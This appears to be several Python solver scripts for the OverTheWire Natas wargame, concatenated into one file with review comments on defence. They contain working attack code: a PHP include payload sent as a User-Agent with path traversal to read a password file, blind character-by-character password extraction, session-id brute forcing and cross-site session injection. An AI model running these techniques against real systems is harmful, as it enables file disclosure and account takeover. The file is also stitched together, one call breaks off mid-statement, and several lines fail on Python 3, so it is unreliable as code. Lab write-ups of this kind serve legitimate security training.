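def main():
    """Fetch the page at URL and store the natas2 password disclosed in it.

    The page is requested with HTTP Basic authentication for ``usr``. The
    response body is searched for the HTML comment that carries the next
    level's password, and the first hit is handed to
    ``natas.save_credentials``. If the comment is absent, a diagnostic is
    printed and nothing is saved.

    ``URL`` and the ``natas`` helpers are defined outside this function and
    are not visible here.
    """
    usr = '******'
    password = natas.get_credential(usr)

    # requests builds the Basic header itself from the (user, password) pair.
    # This keeps manual base64 handling of the credential out of this script;
    # hand-rolled b64encode() on a str also fails on Python 3.
    response = requests.get(URL, auth=(usr, password))

    # The secret sits in an HTML comment of the served page. Markup comments
    # are delivered to every client, so they are not a place to keep secrets.
    match = re.search(r"<!--The password for natas2 is (\w*?) -->",
                      response.text)
    if match is None:
        # Previously this path fell through to the print below and raised
        # NameError, because found_password was only bound inside the loop.
        print('no password found in response (HTTP %d)' % response.status_code)
        return

    found_password = match.group(1)
    print('found password: %s' % found_password)
    print('adding to credentials file....')
    natas.save_credentials('natas2', found_password)
    print('done')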
def main():
    """Request URL as USER and store the natas3 password found in the body.

    The body is scanned for ``natas3:<word>``. When several lines match, the
    last one wins; when none match, the function returns without printing or
    saving anything.

    NOTE(review): indentation was lost in this listing. The three prints and
    the save are assumed to sit under the ``is not None`` guard.
    """
    secret = natas.get_credential(USER)
    # Basic auth is only base64 of "user:password". It is an encoding, not
    # encryption, so the transport has to provide the confidentiality.
    auth_value = 'Basic %s' % base64.b64encode('%s:%s' % (USER, secret))
    response = requests.get(URL, headers={'Authorization': auth_value})

    hits = [m.group(1)
            for m in re.finditer(r"natas3:(\w+)", response.content, re.MULTILINE)]
    password = hits[-1] if hits else None
    if password is None:
        return

    print('found password: %s' % password)
    print('adding to credentials file....')
    natas.save_credentials('natas3', password)
    print('done')
import requests, re, base64, natas

# Authorization header value, built once at import time from the stored
# natas21 credential. Both URLs below are plain http://, so this header
# (base64, not encryption) crosses the network in cleartext.
B64 = 'Basic %s' % base64.b64encode(
    '%s:%s' % ('natas21', natas.get_credential('natas21')))
# Main site, requested with the ?debug query string.
URL = 'http://natas21.natas.labs.overthewire.org/index.php?debug'
# Second, co-located site that inject() posts to.
CO_URL = 'http://natas21-experimenter.natas.labs.overthewire.org/index.php'


def main():
    """Reuse the session id obtained by inject() on URL and save natas22's password.

    Whatever inject() returns is sent as the PHPSESSID cookie to the main
    site. The first ``Password: <word>`` in the response is printed and
    passed to natas.save_credentials; later matches are ignored because of
    the ``break``.

    NOTE(review): this only works if the two hosts honour the same session
    id, which is presumably a shared session store. The defensive takeaway is
    to isolate session storage per application and to restrict which keys a
    request may write into the session. Confirm against the server code.
    """
    cookie = inject()
    print('cookie: %s' % cookie)
    response = requests.get(URL, headers=dict(Authorization=B64), cookies=dict(PHPSESSID=cookie))
    regex = r"Password: (\w+)"
    matches = re.finditer(regex, response.content, re.MULTILINE)
    for match in matches:
        print('found password: %s' % match.group(1))
        print('adding to credentials....')
        natas.save_credentials('natas22', match.group(1))
        print('done')
        break


# NOTE(review): the listing is cut off inside the call below. The remaining
# form fields and the value inject() returns are not visible here.
def inject():
    cookie = requests.post(CO_URL, headers=dict(Authorization=B64), data={
        'align': 'center',
import re
import requests
import base64
import natas
import string

USER = '******'
PASSWORD = natas.get_credential(USER)
URL = 'http://natas15.natas.labs.overthewire.org/index.php'


def main():
    """Recover the natas16 password one character at a time and store it.

    ``guessed_correct`` (defined elsewhere in this file, not shown) is used as
    a yes/no oracle: it is asked whether ``password + c`` is acceptable for
    each candidate character, and the first accepted character is appended.
    The search stops when no character in the alphabet is accepted.

    From a defender's view, a single observable true/false difference per
    request is enough to disclose a whole secret. The alphabet has 62
    characters, so the cost is at most 62 requests per character. Such a
    sequential pattern is visible in request logs and can be rate limited.
    """
    b64 = base64.b64encode('%s:%s' % (USER, PASSWORD))
    alphabet = string.ascii_letters + string.digits
    password = ''

    while True:
        # Lazy generator: candidates are tried in order and probing stops at
        # the first accepted one, exactly like a for/break loop.
        next_char = next(
            (c for c in alphabet if guessed_correct(password + c, b64)),
            None)
        if next_char is None:
            break
        password = password + next_char
        print(password)

    print('found password: %s' % password)
    print('adding to credentials....')
    natas.save_credentials('natas16', password)
    print('done')
import re, requests, base64, natas, string, random

# Authorization header value for natas25, built once at import time.
B64 = 'Basic %s' % base64.b64encode('%s:%s' % ('natas25',natas.get_credential('natas25')))
# The lang parameter names a per-session log file; %s is filled with the
# session id chosen in main().
URL = 'http://natas25.natas.labs.overthewire.org/index.php?lang=..././logs/natas25_%s.log'
# Sent as the User-Agent header of the request.
USER_AGENT = '<?php include "/etc/natas_webpass/natas26"; ?>'

# NOTE(review): the request depends on two server-side conditions that are not
# visible in this file. Presumably a request header is written verbatim into
# the session's log file, and that log file can be reached through the `lang`
# include parameter. The corresponding hardening is to resolve include targets
# against a fixed allow-list instead of filtering path fragments, and to keep
# logs containing request-controlled text out of any includable location.


def main():
    """Request the session's log file through `lang` and save natas26's password.

    A fresh random session id is used both as the PHPSESSID cookie and as
    part of the log file name in the URL. Every 32-character word that
    follows a ``[dd.mm.yyyy hh::mm:ss]`` timestamp in the response is
    printed and saved. There is no ``break``, so the last match is the one
    left in the credentials store.
    """
    session = random_string()
    request_headers = {'Authorization': B64, 'User-Agent': USER_AGENT}
    response = requests.get(URL % session,
                            headers=request_headers,
                            cookies={'PHPSESSID': session})

    pattern = re.compile(
        r"\[\d{2}\.\d{2}\.\d{4}\s\d{2}::\d{2}:\d{2}\]\s(\w{32})",
        re.MULTILINE)
    for hit in pattern.finditer(response.content):
        print('found password: %s' % hit.group(1))
        print('adding to credentials....')
        natas.save_credentials('natas26', hit.group(1))
        print('done')


def random_string(string_length=20):
    """Return `string_length` random lowercase ASCII letters.

    Uses the `random` module, which is not a cryptographic generator. In this
    script the value only names the caller's own session and log file.
    """
    letters = string.ascii_lowercase
    picked = []
    for _ in range(string_length):
        picked.append(random.choice(letters))
    return ''.join(picked)
import natas, re, requests, base64

# Authorization header value for natas19, built once at import time.
B64 = 'Basic %s' % base64.b64encode(
    '%s:%s' % ('natas19', natas.get_credential('natas19')))
URL = 'http://natas19.natas.labs.overthewire.org/index.php'

# Observations (user:password -> observed hex value, presumably the session
# id, though the original note does not say):
#   natas20:admin   3239332d6e617461733230   (hex of "293-natas20")
#   natas20:admin1  3431332d6e617461733230   (hex of "413-natas20")
#   natas21:admin   3632372d6e617461733231   (hex of "627-natas21")
# The part after the "-" (\x2d) is static while the user stays the same. It
# changes only when the user changes, not with the password.
# The first 3 bytes are a number similar to the one in natas18.
#
# Hex encoding adds no entropy, so the identifier is only as unpredictable as
# the small number in front of the user name. Session ids should come from a
# CSPRNG and must not embed guessable fields.
USER = '******'
PASSWORD = '******'


def main():
    """Try the numeric ids 0..640 in order and store the first password returned.

    ``do_request`` (defined elsewhere in this file, not shown) is called once
    per id and is expected to return ``None`` until an id yields the
    password. Progress is printed every 20 ids. The loop stops at the first
    hit, after saving it as the natas20 credential.
    """
    for i in range(641):
        if not i % 20:
            print('requesting: %d' % i)
        password = do_request(i)
        if password is None:
            continue
        print('found password at %d: %s' % (i, password))
        print('adding to credentials....')
        natas.save_credentials('natas20', password)
        print('done')
        break